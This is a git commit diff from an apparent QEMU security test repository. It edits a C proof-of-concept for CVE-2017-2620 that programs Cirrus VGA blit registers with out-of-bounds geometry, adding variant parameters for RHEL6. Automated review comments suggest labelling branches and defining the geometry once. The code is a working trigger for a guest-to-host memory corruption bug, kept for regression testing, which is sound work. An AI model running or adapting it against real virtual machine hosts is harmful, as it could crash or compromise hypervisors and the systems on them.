authorGerd Hoffmann <kraxel@redhat.com>2017-02-16 10:59:14 +0100
committerGerd Hoffmann <kraxel@redhat.com>2017-02-21 13:23:43 +0100
commitc418d2b04f7195513ac9e16d576ccb38b90e9561 (patch)
tree88926a03263597d8c152843b30000a8373ec1fd0
parentf53c7f3a5d31e94e0e9470cc24453ed73c35eccb (diff)
downloadqemu-security-c418d2b04f7195513ac9e16d576ccb38b90e9561.tar.gz
change blit params for rhel6
-rw-r--r--cve-2017-2620.c11
1 files changed, 10 insertions, 1 deletions
diff --git a/cve-2017-2620.c b/cve-2017-2620.c
index e9fb50f..724f95f 100644
--- a/cve-2017-2620.c
+++ b/cve-2017-2620.c
@@ -28,12 +28,21 @@ int main(int argc, char *argv[])
mmio[BLT_OFFSET + CIRRUS_MMIO_BLTSTATUS] = CIRRUS_BLT_RESET;
mmio[BLT_OFFSET + CIRRUS_MMIO_BLTSTATUS] = 0x00;
+#if 0
*(uint16_t*)(mmio + BLT_OFFSET + CIRRUS_MMIO_BLTWIDTH) = 1024 * 3 - 1;
*(uint16_t*)(mmio + BLT_OFFSET + CIRRUS_MMIO_BLTHEIGHT) = 1 - 1;
*(uint16_t*)(mmio + BLT_OFFSET + CIRRUS_MMIO_BLTDESTPITCH) = 1024 * 3;
*(uint16_t*)(mmio + BLT_OFFSET + CIRRUS_MMIO_BLTSRCPITCH) = 1024 * 3;
*(uint32_t*)(mmio + BLT_OFFSET + CIRRUS_MMIO_BLTDESTADDR) = 16 * 1024 * 1024 - 1;
*(uint32_t*)(mmio + BLT_OFFSET + CIRRUS_MMIO_BLTSRCADDR) = 0;
+#else
+ *(uint16_t*)(mmio + BLT_OFFSET + CIRRUS_MMIO_BLTWIDTH) = 3 - 1;
+ *(uint16_t*)(mmio + BLT_OFFSET + CIRRUS_MMIO_BLTHEIGHT) = 1024 * 7 - 1;
+ *(uint16_t*)(mmio + BLT_OFFSET + CIRRUS_MMIO_BLTDESTPITCH) = 1024 * 3;
+ *(uint16_t*)(mmio + BLT_OFFSET + CIRRUS_MMIO_BLTSRCPITCH) = 1024 * 3;
+ *(uint32_t*)(mmio + BLT_OFFSET + CIRRUS_MMIO_BLTDESTADDR) = 16 * 1024 * 1024 - 4;
+ *(uint32_t*)(mmio + BLT_OFFSET + CIRRUS_MMIO_BLTSRCADDR) = 0;
+#endif
mmio[BLT_OFFSET + CIRRUS_MMIO_BLTMODE] =
CIRRUS_BLTMODE_PIXELWIDTH24 | CIRRUS_BLTMODE_MEMSYSSRC;
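Review bot: The `#if 0` / `#else` pair leaves two complete parameter sets in main() with nothing in the file saying which target each one is for; only the commit title mentions rhel6. Label the branches, e.g. `#if 0 /* original blit geometry */` and `#else /* rhel6 geometry, see commit message */`, or select them with a named macro such as `#ifdef BLIT_PARAMS_RHEL6` so both variants can be built without editing the source. A one-line comment on why the rhel6 build needs the narrow, tall geometry (width `3 - 1`, height `1024 * 7 - 1`) and the `- 4` destination address would also make this regression test easier to maintain. main() starts and ends outside the hunk.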
@@ -44,7 +53,7 @@ int main(int argc, char *argv[])
fprintf(stderr, "setup done\n");
sleep(1);
- for (i = 0; i < 16384; i++)
+ for (i = 0; i < 1024 * 7 * 3; i++)
blit[i] = 0;
fprintf(stderr, "blit done\n");
sleep(1);
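Review bot: The loop bound `1024 * 7 * 3` repeats the height and width written to BLTHEIGHT and BLTWIDTH in the previous hunk, so the two can silently drift apart if either is edited. Define the geometry once, e.g. `#define BLT_W 3` and `#define BLT_H (1024 * 7)`, write `BLT_W - 1` / `BLT_H - 1` to the registers and use `for (i = 0; i < BLT_W * BLT_H; i++)` here. Whether the count is in bytes or wider words depends on the type of `blit`, which is declared outside the hunk, so the unit deserves a comment as well. The test prints only "setup done" and "blit done"; presumably reaching the second message with the guest still running is the pass condition, and a comment stating that would help whoever runs it against a patched host.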